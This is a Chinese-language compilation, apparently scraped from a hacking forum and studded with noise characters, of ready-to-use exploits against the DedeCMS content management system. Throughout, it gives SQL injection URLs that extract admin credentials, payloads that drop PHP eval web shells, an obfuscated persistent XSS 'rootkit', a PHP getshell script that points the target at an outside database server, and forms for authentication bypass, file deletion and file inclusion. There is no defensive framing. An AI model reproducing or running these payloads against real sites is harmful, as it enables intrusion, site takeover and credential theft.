|
|
" d2 Z- u9 j: L$ M) h, jDedecms 5.6 rss注入漏洞
6 X# ?. i; J; W. J+ a. Dhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
' ]- I, X2 H R: z8 R
X8 o% h+ q; C: a8 H8 @4 {4 G, N7 N& b- M: ^; u( G4 W
* I4 Z, \* k y H; {+ Z& o
Z- T& V$ O! ]8 p
1 G$ ^4 _2 R, E2 m
8 R9 `3 \9 B5 Z8 D
2 N6 v4 m* Q9 J5 O9 ?; m, p
. T% E$ C5 h6 a# n1 cDedeCms v5.6 嵌入恶意代码执行漏洞4 ~0 S$ Q6 H$ z0 u6 f; `
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
& d; W* u" [* `% K发表后查看或修改即可执行7 b1 h. y+ a" n5 \8 j+ j
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ b# c0 a- F2 Z& N8 q
生成x.php 密码xiao,直接生成一句话。( }& h# f. ~: `) S4 H9 `7 w
8 O N! `2 S }4 b/ q' ]
+ t* U: |2 }2 k4 ]2 n/ Y1 j
& I; T2 R9 z# O% e0 ? U
: ~) }3 w( M+ x* G% j
7 K$ u; \2 s* q9 J6 a5 p
) b: _: Y6 E# j5 g% x9 S* i/ c g, V3 i2 d3 H) r
' o% O3 G; o# D3 o( n" q( b& WDede 5.6 GBK SQL注入漏洞9 b4 n4 _- q# ?$ H) C
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';. z+ x8 c* r# c- k7 W
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe. p: J( h+ K( {5 p
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
! d0 v% S- G( R# o! n! T, U
% I8 |+ p8 m0 z; g- |( g2 j' U& [, \% l
& Q9 p' g$ W; S+ a+ ~/ `2 y% M8 I5 m {1 Z, n
! s- X! c# Y$ N4 ^, A
/ |" ~1 d2 u3 o: A- m" ~$ C
' F' e3 @8 ~& X( @" {5 x6 p$ s
: j) E# b' B, q, x% R: ODedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞4 C p2 C. e% t4 |* f) a ]( p
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 5 H7 Y' L# b, X# @* M
$ L4 L/ p! z+ ~. a4 w* {/ k7 e" N) L G. G0 w: v3 ~; ` O
* V( o4 K+ G0 \
' r6 f* N8 s5 g$ R1 w* |. L
, r8 j' S6 n; ^7 o# {
: C( b! v3 Z w6 KDEDECMS 全版本 gotopage变量XSS漏洞5 {: O1 A y+ c( D( t2 U
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
5 e. B1 p* @% W1 J$ Fhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
0 q8 k' Z8 _8 g/ B* F
! P5 K6 y Y* P4 @) w0 q
% x, u8 c7 g; j! P$ ]. H: T( U+ Q2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 @0 f* v; J2 i
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda* u4 m# Q( L3 c4 H6 m+ N% v; P! s
# }# e9 u+ s% g% f) `/ m
! f+ Z0 q% h, Z# I4 X9 Zhttp://v57.demo.dedecms.com/dede/login.php+ G, T; a& I. ^# |
0 I8 C- @6 i# U
2 d& q# Z) X" F* ]
color=Red]DeDeCMS(织梦)变量覆盖getshell$ }: b, A* B$ m- t2 r) n3 E. C
#!usr/bin/php -w
6 a/ E0 ?: `: X8 r6 q<?php
7 ^8 N! \6 ^4 u, l7 {* m2 serror_reporting(E_ERROR);8 }! V I4 s. F, G: Q" C
set_time_limit(0);
" C Q+ C0 }- i- cprint_r('
" F+ S! m/ _1 \4 pDEDEcms Variable Coverage
% H) b, @9 `0 T, V/ k' ?Exploit Author: www.heixiaozi.comwww.webvul.com+ w }9 f9 F) J9 a a, _6 H) L
);0 A0 h( u6 F5 a) T* ]; K
echo "\r\n";
+ R6 j' y+ E# ~4 g; zif($argv[2]==null){0 }/ C3 x1 H0 F8 m! N/ i3 X
print_r('
/ D8 N' R$ q D5 \5 v+---------------------------------------------------------------------------+
3 v. x3 K# W3 O% c8 x3 HUsage: php '.$argv[0].' url aid path
4 y6 j# c2 a) Z b }) daid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
) u5 Q) Q: i- ZExample:
, d5 o6 T, w1 \- c5 D7 T6 G7 cphp '.$argv[0].' www.site.com 1 old
) b$ K( d- y: ^+---------------------------------------------------------------------------+7 f5 j) L# z- \$ }; i! ]
');
9 ? ]; s: d+ K/ H m- K/ x- Dexit;! J2 L1 q% ]% o
}: f6 }" g) I3 ^6 T' k$ j6 q: N
$url=$argv[1];2 p" r/ C$ C8 x! V" n
$aid=$argv[2];
$ X( ~) O, z0 f" r+ N+ U+ E) P$path=$argv[3];
5 k! Y. q0 n$ \3 Y, g( D$ t; c% O$exp=Getshell($url,$aid,$path);
$ G; S7 ]" p3 xif (strpos($exp,"OK")>12){
* S7 S8 Z- a F. I% lecho "' G; b8 S$ t8 e- b$ G( P
Exploit Success \n";
% `; J; D3 L! k4 Q* F$ D# d5 wif($aid==1)echo "6 t" r* w* f9 m' M* G2 C1 F
Shell:".$url."/$path/data/cache/fuck.php\n" ;
# Z$ k, e) v1 |( W( N% E2 C8 L8 k: T
1 L* Q! Q- h1 q' D& _" X- K' W
if($aid==2)echo "- m: }; p! t6 ~: _" a' `/ _8 p, B
Shell:".$url."/$path/fuck.php\n" ;
# ~& Y' F9 |& [6 X* x
- B- k* o" ?7 `: J9 M2 n
9 m) o" N" r7 S' {2 W: P. t# s* Wif($aid==3)echo "* [4 t1 I! T2 \) N1 v
Shell:".$url."/$path/plus/fuck.php\n";
! c# i/ a- o5 l& F$ f7 U. v3 Q- E; {% w4 L. m5 `6 z& B
k8 |# Y+ b9 s}else{
4 r+ D7 h/ Y3 `echo "
`2 y0 r9 N A' w6 b; DExploit Failed \n";7 ~ w. T' S0 o6 u5 |& W# @+ H8 Q# o0 w
}8 u5 Z( S3 O8 `: u) B! D
function Getshell($url,$aid,$path){& l6 Z% M' W6 ~* h
$id=$aid;5 b8 o* `1 z+ A/ J% `2 }7 {
$host=$url;
6 J2 }6 d& f, Y: u+ a$port="80";2 x# H7 [$ g8 N
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
0 M$ L8 f# T4 w4 A7 O$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";" c4 G) f- W/ G9 T
$data .= "Host: ".$host."\r\n";
% e c6 x9 E, O# i( ]4 w$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";! l' ~% ]7 y# b0 `; O! S3 W
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+ M3 E1 T. ]. Z/ t a, e8 C& s B$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";+ r# }) E4 }, g( |, P$ Q: U1 |% x
//$data .= "Accept-Encoding: gzip,deflate\r\n";. Z/ {2 p1 Z P g1 D5 V3 P
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
* ^8 v/ A6 P8 T% e7 F0 N, A$data .= "Connection: keep-alive\r\n";
+ d) w: O0 i* w; Y$data .= "Content-Type: application/x-www-form-urlencoded\r\n";! B& j0 ]* Y( O! `
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";5 ^; J* L7 ?6 p+ @% b* t7 Q! V- H
$data .= $content."\r\n";4 J! g4 a+ |; a8 t
$ock=fsockopen($host,$port);
' n( r5 r/ l5 U* }* g- T6 s$ _if (!$ock) {
! v: O( `3 N+ u0 Q- necho "2 ]6 D' w% i$ y' v5 ]3 U( P
No response from ".$host."\n";4 K. y N# ^1 A6 Z2 B
}
0 G. S+ o/ g* k) Q( V* }fwrite($ock,$data);
, V1 W9 X: o9 U0 v& I* w1 Q/ ~while (!feof($ock)) {- c) }$ v$ T( W( U
$exp=fgets($ock, 1024);
& U* o/ r% a: y+ k, S# s5 F% ^return $exp;# \8 X! W1 U% e9 c5 F# l# J. z
}! G* Z% {) I9 i! F, R6 m/ [
}7 n2 q' Z4 y4 t* T% `6 n' U6 Z
- _2 p! r. p) T* j
7 M7 `6 \7 W! A, J6 p) x
?>
% T; G- f: k# g, J1 x& x" E% ]$ ~: T3 s, D9 z# n
' x5 `- k* L3 T+ |6 Q; j/ Z# a8 |
3 R. a+ E1 e8 I# G6 L( n+ N
, ^1 \& I! W5 q0 U' B# K4 W- V
* b' x: Q( s) s' R* f6 J2 i& h% ]
0 Q& {2 C, T% m' b6 R
% @+ Y r9 M3 k2 e
/ O' E: ]6 n1 A! V, R3 k% |( ]! e; B1 j& I% r8 i
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)9 Q' ~( m# ?4 M( R# {" c6 v9 ?
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* ?' J& ]' p. ]8 P9 v/ Y! `3 j
+ `& I% _5 \& J1 q3 ?$ @2 r7 n5 F5 _
6 L/ |2 S- \' M3 ^% _. C- \
把上面validate=dcug改为当前的验证码,即可直接进入网站后台& D9 k% E5 ^) v6 z# b! i
# M+ m& C* U7 a) t. E6 f* N
2 J; j, F6 X4 V. D5 L2 T+ ^此漏洞的前提是必须得到后台路径才能实现0 R+ m v5 o( w& _# w+ L$ ]& Y5 [. Q
2 @" u5 e5 h6 b0 [
7 i+ M/ L$ k+ g' o+ {+ M, r3 e/ M3 [ Q- w0 J2 u, F( D- G) J( T
6 ^# i! |! T. T5 r* S4 N, h9 p! J8 z" j8 t" U0 h7 K+ ~ g
3 e$ O% H$ k+ e$ Z" s
, y( W3 `6 e3 n3 o$ ^) _
! P' e# E* V, Y3 }! R1 {
7 f2 o" H/ @- U0 y
# s) I6 z# A! \; G9 a0 YDedecms织梦 标签远程文件写入漏洞2 n! {" R; s7 a" b; {4 g7 E! u' F
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
- k4 f1 i9 M% E6 P6 [9 o- W5 H3 d" \4 Y" G+ M& H
1 x: O1 @* b$ e& b! m
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
, z2 ~. ?1 G5 }% ^7 @" H<form action="" method="post" name="QuickSearch" id="QuickSearch">
! a9 r( q# }1 o V A8 a2 ?<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. M# }% k" u S8 L9 E
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />/ I6 a& B3 T6 Y4 w
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ t; Q: C( Y# @; E* R: v8 _# W<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
) s% k9 Q- X2 \& u$ D<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />7 F9 I+ }" [" [# o. {4 k7 h# ~
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
' [; U0 [6 s# n' \) G<input type="text" value="true" name="nocache" style="width:400">
5 @) a8 S0 L1 T<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 ]2 ^( `. L7 d" V6 o</form>% ^6 V; [% V) i/ H" @0 r2 U2 {0 b
<script>* \+ @: p& o9 N% ^. b l* B: k
function addaction()4 k+ Z; |) ^" E/ e b& _
{
# i) q2 t! c& b1 ?' [document.QuickSearch.action=document.QuickSearch.doaction.value;
. K/ H4 {% L: G& S}- r4 a1 s0 @7 s6 L" u6 b( c) \1 r
</script>
- D5 B9 N8 p: D2 S- Q
0 a. t n/ B) p7 b3 x( R
; U$ {- f" E3 }
, V1 K% K9 i0 G! x" m! @" Q- g' ^ z% ^$ N N6 Z* e7 g5 z
! G" {9 c2 p" Y0 f* I7 @
# |8 m- M) v E* A6 O0 S
8 V& I' C, _) m+ |( R8 j& O; D: L5 J s7 X
' y6 R$ I2 k& X, o3 K, T5 o5 c+ X
4 c4 ^1 `7 I* l, S! ]4 k2 D' |8 _DedeCms v5.6 嵌入恶意代码执行漏洞
% ~! j6 `) j3 Z! F3 u注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行. B. ^. U' C x$ F
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}) a/ f$ T. S/ z6 `5 s( X) i
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得& C' l. z# V1 \$ Q- ?/ j0 q; t
Dedecms <= V5.6 Final模板执行漏洞; y0 U' _) C8 j- f: e6 Z: p: y8 n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
6 ?6 f: n6 o/ _, j) o% Uuploads/userup/2/12OMX04-15A.jpg" N/ E) w$ v# K i6 _# U
$ T Z% {' [# \; R2 D9 _, e( y
/ B( m7 M2 Z: X, P$ h
模板内容是(如果限制图片格式,加gif89a):$ f- I) |/ h U9 j$ |8 R4 L8 {
{dede:name runphp='yes'}' h* x2 I' O" M/ |/ c; U5 M2 N
$fp = @fopen("1.php", 'a');
# Y. ~0 v3 \2 X8 Y" ]@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");; ] |# _$ A6 q) T( x; t* V% F
@fclose($fp);* z, H5 W6 e) w; o) [) z: c9 T& j
{/dede:name}
: Q% g* a- A2 ]/ X9 T2 修改刚刚发表的文章,查看源文件,构造一个表单:
) w, W& Q2 I; q9 @2 j- v<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
! Y! v m) n/ I# g. k<input type="hidden" name="dopost" value="save" />
6 w* A8 q3 \. P! H! G, _+ H6 J<input type="hidden" name="aid" value="2" />
( J9 r6 O/ m3 D* I$ G- S<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
, f( G* x+ R3 l% F1 D<input type="hidden" name="channelid" value="1" /> b+ s# I6 I& ^0 U9 O, a
<input type="hidden" name="oldlitpic" value="" />4 C+ S; X B1 H9 n% E$ C A* J
<input type="hidden" name="sortrank" value="1275972263" />$ b7 Q" N0 Z% G# _. B* l) A
& E% A% I3 p8 {: b2 f- g
+ H" d% R$ R7 ^; v$ {% G
<div id="mainCp">
9 T3 N) w4 O7 V w<h3 class="meTitle"><strong>修改文章</strong></h3>5 b7 k! y! t9 U3 s% `- A
6 `' W3 `& @9 k; _( } Y
( b6 g- P a. B! r# v
<div class="postForm">; B1 E- n* F; i
<label>标题:</label>
9 J: v' e1 |8 L1 E, i" g0 M<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
. W+ F) P* X5 I5 A- @+ m
. ^, U- @( O& p
: o- V9 g1 v& w/ _4 r( L- L/ ~8 N( D<label>标签TAG:</label>
8 V. A9 d( p! O1 o<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
, i+ o! H( [$ N" y0 O/ f( \8 D
' W8 E4 n7 P9 ], H, R" x* h5 f8 g% A1 t( ]7 p
<label>作者:</label>( _1 T5 }" b2 V# d. k
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
) n& G5 ?+ Y/ N* U9 i4 ]1 D8 F" j3 R- g+ H7 ?! E6 I
% ]; p) I' o2 m- _3 ?7 `
<label>隶属栏目:</label>
1 f9 `* ^5 r. e/ X3 I3 [<select name='typeid' size='1'>$ |# g9 d+ X1 r
<option value='1' class='option3' selected=''>测试栏目</option>
# J% H/ t2 c. M2 ]</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)' S# d" j/ u/ y! A" [% r& D! T
, A2 j6 ]: W' t: I7 P& J" Y0 I
- d- m! X; X- `& H7 F
<label>我的分类:</label>
* x. B) T' \( d4 q9 q r<select name='mtypesid' size='1'>* ~+ h; g# M5 ?2 v: W: G
<option value='0' selected>请选择分类...</option>
- O+ ?2 {4 z0 f- F8 A<option value='1' class='option3' selected>hahahha</option>
1 }# F, Q6 {7 n/ C' F# l! ^</select>
1 L% y# q1 n% V c5 h. D) ]5 k
+ t( g! Y7 C4 k: \% @- f- g: t% |7 X5 ^! x& O4 V2 f( `
<label>信息摘要:</label>
* g0 `% b9 r% e<textarea name="description" id="description">1111111</textarea>
2 s+ F4 ], |! t3 u(内容的简要说明)
1 Z, e9 P$ V* Z: |9 {4 B) s4 \' n. u& c2 A4 F! [
, w o3 x* `/ K: z5 A
<label>缩略图:</label>. O$ F6 h' q/ O9 H2 s# g
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>! O/ m% G+ ~1 j0 E
6 W" x. f0 A4 ~9 w; N
7 L: V% ?, a# R9 R<input type='text' name='templet'
7 {2 j: u3 L/ a( g2 X6 ]value="../ uploads/userup/2/12OMX04-15A.jpg">
3 a/ z- X) h5 S9 {9 @5 {. v<input type='text' name='dede_addonfields'
( g/ Z" p3 t$ uvalue="templet,htmltext;">(这里构造)0 V' K6 ]* Z: K
</div>
- h0 p# s m1 M# D ~, Z! [
* Z* R- A" \: V8 l" m7 K+ U+ y3 C& C
<!-- 表单操作区域 -->% v# \# V- X+ V: B4 I: t$ z" |
<h3 class="meTitle">详细内容</h3>
- `( o4 t e% }& P/ g8 {& A$ } B; J0 B. S
/ {' W# n( q5 J3 s' i% L" M+ N0 b<div class="contentShow postForm">/ b: \* r2 f. e. W- v+ p4 n) I1 Q, T. B
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
7 q( ^$ I# B% }/ v) {6 k
X: k8 u. ~3 `8 x# X+ ?6 c# |5 s+ q& @) w
<label>验证码:</label>' g8 T6 f( ?# O& R
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />, m, _" r d6 @" B/ \: D( R
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
, C* u; Y- z" U- [ d0 S* w7 [. J1 e+ j3 [* c9 @+ J( g: C
" o3 T' E# h2 R) m0 o3 M6 T
<button class="button2" type="submit">提交</button>
0 ?7 S* D; u8 p: {0 e v<button class="button2 ml10" type="reset">重置</button>- X3 L# ?' f% [% V) Z: u; L
</div>8 u3 Z" F6 H" A+ J% O3 e
5 e' x6 e6 x2 {6 n! M* `$ H7 r( J+ q. \0 n, W
</div>
8 N. [1 g7 a: h! d! P
# ?" A1 [0 [8 ]2 Q
% S9 `2 q) [. F4 {" I# ~</form>9 t8 Q+ `$ H2 n5 w# s n1 O( t! l5 v
6 w6 ]1 j9 y9 o/ O; T2 B" G; [. \
1 X' ?3 r: y, E2 K& S8 d' c
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
0 e8 m0 K+ g) f$ D+ o1 S% Y假设刚刚修改的文章的aid为2,则我们只需要访问:
& c$ S1 A* F+ l2 Q( I4 rhttp://127.0.0.1/dede/plus/view.php?aid=2
! n8 y, i" j( V: ~! C( M即可以在plus目录下生成webshell:1.php8 P: {( l( S* ^8 T
* {( {/ {* t/ w: C, h. D4 |( J4 I" ~, N0 Z3 r
4 }, ^. }& U4 [2 B& I+ H
" Q3 X, V2 K0 A/ e- P3 j
# x, M0 P3 S- f, Q; G7 j' |
2 H# Z3 Q! s5 J' {6 F: L$ B* i4 S% K- P7 B+ Z3 |
) {2 n5 B& s! k* B! Q
# f, Z8 d& ^- n2 K8 M, Z }
; J1 q7 @- {( U4 l. N$ R
$ p4 s% r9 ]. O# e0 X% D; U: d& e9 M) |& }+ |* e0 t% L
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
e# f& ~, T: T! o. sGif89a{dede:field name='toby57' runphp='yes'}
' x, g/ q# x6 b) B7 C! C* iphpinfo();8 L j7 N/ U$ m7 \1 M
{/dede:field}
\6 w! N" j' b. Q% \保存为1.gif( h% n# E9 x% h( @! L h
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
1 x4 N, l- A: C* E9 {<input type="hidden" name="aid" value="7" /> 5 ]5 g& T, @2 @( ]7 a4 z- ~2 T9 z7 z
<input type="hidden" name="mediatype" value="1" />
5 w3 k5 g3 T9 j1 ]7 r. \<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> $ ?: _5 ^3 Y* M& q* P4 U- }+ J) K/ ?6 D
<input type="hidden" name="dopost" value="save" /> 7 J* y# Y& Z! i3 m: ~
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
0 I; D" ]. P% D$ A$ W; a<input name="addonfile" type="file" id="addonfile"/>
2 o$ R) g7 e4 F' h3 w1 p" c<button class="button2" type="submit" >更改</button>
6 b3 D& |, Y1 r; U</form>
/ _, g6 T# x0 d0 g# k% \$ U. H" \$ K1 z
+ m ^& Z! w2 H" O4 N
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif D" n9 b; G i
发表文章,然后构造修改表单如下:+ J* ^# |2 H; d
6 m: c/ R1 f" {
8 {0 [: q# F1 Z8 j
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
. F" G6 Y) \! P1 p% L! ?* m<input type="hidden" name="dopost" value="save" /> 0 V3 x9 _) N; \# Q' ~5 J4 H
<input type="hidden" name="aid" value="2" /> ; s. \# a5 i# f! ^6 Y5 g& z
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
3 V" z7 l# c f# I: [9 p<input type="hidden" name="channelid" value="1" />
1 c0 B0 H$ g3 O& P) E7 n% f<input type="hidden" name="oldlitpic" value="" /> V$ a; X; u0 ]& j& }( t
<input type="hidden" name="sortrank" value="1282049150" /> % p- ^+ T0 g5 Z
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , w& B6 b' T" v# G$ U2 [
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 6 Q6 O* V2 h0 P$ d+ ^( N
<select name='typeid' size='1'>
' ], p+ _. R) @<option value='1' class='option3' selected=''>Test</option> 9 e+ V5 }0 N. v B0 S+ f" G/ _4 d: X
<select name='mtypesid' size='1'> 7 Y2 h8 W# p( ]7 l1 B
<option value='0' selected>请选择分类...</option>
: d8 H* w1 _* e<option value='1' class='option3' selected>aa</option></select>
3 a1 U! Z6 V3 }<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> / k* k8 Z* z% y8 y# G
<input type='hidden' name='dede_addonfields' value="templet"> " Q9 L5 w1 S& C$ S. H8 L: F
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
9 E5 I* \+ p9 N7 m<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
8 W& Y N: R4 V$ C4 P' Y4 Y( g4 S/ r/ \1 f<button class="button2" type="submit">提交</button> ! w% V+ a$ V5 U4 x1 j
</form>
7 B! H- ]. N* x5 N$ c
) ^9 Y! X6 c4 k! ^1 e
' m3 ^2 [: k/ f- D
8 u7 p+ E9 s V4 i9 ^; Q9 \
- o# {3 Y# X. \0 S0 Y9 s
& H9 k4 w0 v& k; S4 C0 p, e5 j, ]
6 T- m3 N4 ]7 j4 {( m$ c/ W# a+ g3 S& Q
+ h2 ~& p) e8 R7 a
6 }. A4 P- {: N# k; G3 \5 b/ [+ g f1 }" X+ T3 T
9 d7 B; [# W( w4 K& P, c
% y' s3 Y, r3 J1 j9 S+ P& C织梦(Dedecms)V5.6 远程文件删除漏洞; b: p+ P/ ~! a3 K2 K
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
( a- w% ^& Q2 u q; O- f* B$ m8 l4 }
/ _, x+ [9 k; L6 a! K* F2 T, B1 `4 }8 e
6 v: Z" @: ]0 j1 i' U/ v8 @. B/ q/ |5 t$ e/ V
* B; o$ M8 k1 b( p. u4 h G, |
" E7 a" x$ _$ B' V) q) w& u
% w$ u; o7 |9 B) d% [5 _% Q$ F7 b5 ~: j7 {
I+ y" L: L* g9 }3 a2 ]
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 8 J- j' k/ n6 r7 V" r! P
http://www.test.com/plus/carbuya ... urn&code=../../6 f9 L* G/ r# k/ N
9 }6 D+ i8 {) a, j c y0 V1 r
8 s& ~; H& m; t a/ `
: N m( C, q( U% t! ^" @, R4 m
8 p0 E7 F3 g4 A0 I/ X7 h g8 s4 O M# L
* R0 l1 p. o7 o3 v; u7 Z$ o
0 M4 i) ?' M0 a! \. z; F8 I5 y" \/ A8 t1 k3 C0 M# _) ~
; q2 m$ `" Z( J
- a/ i, x8 Y! I2 B& @
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ' n. j! B$ u6 s6 ?1 J% D0 ?
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
7 d9 W% E5 ]0 \6 k {9 W% s3 }密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5 p b7 X5 K0 M0 e* | G D
3 T3 p9 \2 `0 I' V
9 S8 l2 }0 z1 j
$ M: g/ G6 {$ O, q; G
6 Y/ k) c# Q0 o& b1 {+ \9 t2 l0 M( K; d! j; X: P9 _
6 e1 v; y; K+ c% ?( ?" K
0 w5 [5 A! e0 n$ `/ o4 f& D+ U J3 L/ e3 Q/ w( }/ }
0 @# i Q7 Y9 ?/ ?
- H# r* q1 _9 \! y0 q织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
3 U9 B k6 G8 Q% n Phttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
: ~' y7 h+ `* {$ C* r* \3 I% n- s! {7 L# n' v: u6 O1 H9 v
( K' V- }' u# W4 ]7 }0 a
- S Y. X l; p; o: m, z) s4 g7 \: P7 }: v1 Z9 @( I m
